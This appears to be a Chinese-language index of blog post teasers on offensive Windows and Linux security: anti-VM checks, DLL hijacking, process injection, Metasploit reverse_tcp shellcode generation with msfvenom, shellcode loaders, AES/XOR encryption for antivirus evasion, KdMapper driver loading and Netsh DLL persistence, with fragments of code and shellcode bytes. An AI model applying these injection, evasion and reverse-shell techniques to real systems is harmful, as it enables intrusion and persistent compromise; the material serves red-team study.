- 2024-12-09【攻防技术系列+沙箱】反虚拟机+注册表检测
判断注册表项是否存在intregistryKeyExist(HKEYrootKey,char*subKeyName){HKEYregistryKey=nullptr;LONGresult=RegOpenKeyExA(rootKey,subKeyName,0,KEY_READ,®istryKey);if(result==ERROR_SUCCESS){RegCloseKey(registryKey);returnTRUE;}retur
- 2024-12-09xv6 lab10: mmap
实现两个功能:分别是mmap与munmap,将文件映射到内存当中,并为一个线程记录他管理的文件所在的页表目录。函数原型如下:char*mmap(char*addr,intlen,intprot,intflags,intfd,intoff);intmunmap(char*addr,intlen);其中mmap参数含义分别是映射地址(为0时由内核代
- 2024-07-16暑期集训shellcode5(手搓机器码)
拖进ida里面反汇编再让人工智能分析(我是废物)(后来给源码了,直接上源码)#include<string.h>#include<stdio.h>#include<stdlib.h>#include<inttypes.h>#include<capstone/capstone.h>#include<sys/mman.h>intupkeep(){setvbuf(stdin,NULL,_IONB
- 2024-02-15DLL劫持
DLL劫持DLL是Windows上的动态链接库的文件格式而DLL劫持是攻击者是利用一些缺陷,使得进程在加载原本DLL时加载了攻击者准备好的恶意DLL文件对于渗透测试,DLL劫持是我们在权限维持阶段常用的trick,同时也是白加黑免杀的一种技巧DLL开发以及调用选用windows上的visualstudio这款I
- 2023-10-25Metasploit Linux Reverse_Tcp Shellcode 源码分析
分析Metasploitlinux/x64/shell/reverse_tcpshellcodeShellcode生成使用msfvenom生成c格式的stagedshellcode$msfvenom-plinux/x64/shell/reverse_tcp-fc-ax64--platformlinuxLHOST=192.168.48.233LPORT=4444Payloadsize:130bytesFinalsizeofcf
- 2023-09-20进程注入之ListPlanting——滥用listview控件的消息回调函数
效果:注入代码到“注册表编辑器”(当然,必须是要有listview这种列表显示才可以执行) ProcessInjection: ListPlanting Othersub-techniquesofProcessInjection(12)看看官方的介绍Adversariesmayabuselist-viewcontrolstoinjectmaliciouscodeinto
- 2023-08-16x64ShellCode-通过PEB获取模块地址.
以x64dbg.exe调试x64dbg.exe为例.汇编代码为如下.movrax,qwordptrgs:[0x0000000000000060]movrax,qwordptrds:[rax+0x10]二进制硬编码如下"\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x48\x8B\x40\x10\x90\x90"结果如下:
- 2023-07-28windows下shellcode注入的例子(WriteProcessMemory+CreateRemoteThread)
vs里x64编译如下代码: #include<iostream>#include<Windows.h>//#include"common.h"intmain(){ //msfvenom-pwindows/x64/execCMD=notepad.exe-fc unsignedcharshellcode[]= "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x0
- 2023-07-22内核映射器(KernelMapper)开发-扩展KdMapper在Window 7 x64的支持
1、背景 内核映射器有较多年历史了,其中KdMapper是比较著名的,原版中它使用intel的驱动漏洞可以无痕的加载未经签名的驱动。只不过当前只支持在Win10及Win11上运行,现在进行功能的修改以支持在Win7x64环境上。当前假定读者对KdMapper的原理比较了解并编译调试过相关代码。 2
- 2023-05-24总结加载Shellcode的各种方式
1.内联汇编加载使用内联汇编只能加载32位程序的ShellCode,因为64位程序不支持写内联汇编#pragmacomment(linker,"/section:.data,RWE")//将data段的内存设置成可读可写可执行#include<Windows.h>//ShellCode部分unsignedcharbuf[]="\xfc\xe8\x8f\x00\x00\x00\x60\x89
- 2023-05-24实现免杀:Shellcode的AES和XOR加密策略(vt查杀率:4/70)
前言什么是私钥和公钥私钥和公钥是密码学中用于实现加密、解密和数字签名等功能的关键组件。私钥是一种加密算法中的秘密密钥,只有密钥的拥有者可以访问和使用它。私钥通常用于数字签名和数据加密等场景中,它可以用于对数据进行加密,同时也可以用于解密已经被加密的数据。公钥是
- 2023-05-22Window权限维持(十):Netsh Helper DLL
Netsh是Windows实用程序,管理员可以使用它来执行与系统的网络配置有关的任务,并在基于主机的Windows防火墙上进行修改。可以通过使用DLL文件来扩展Netsh功能。此功能使红队可以使用此工具来加载任意DLL,以实现代码执行并因此实现持久性。但是,此技术的实现需要本地管理员级别的特权。可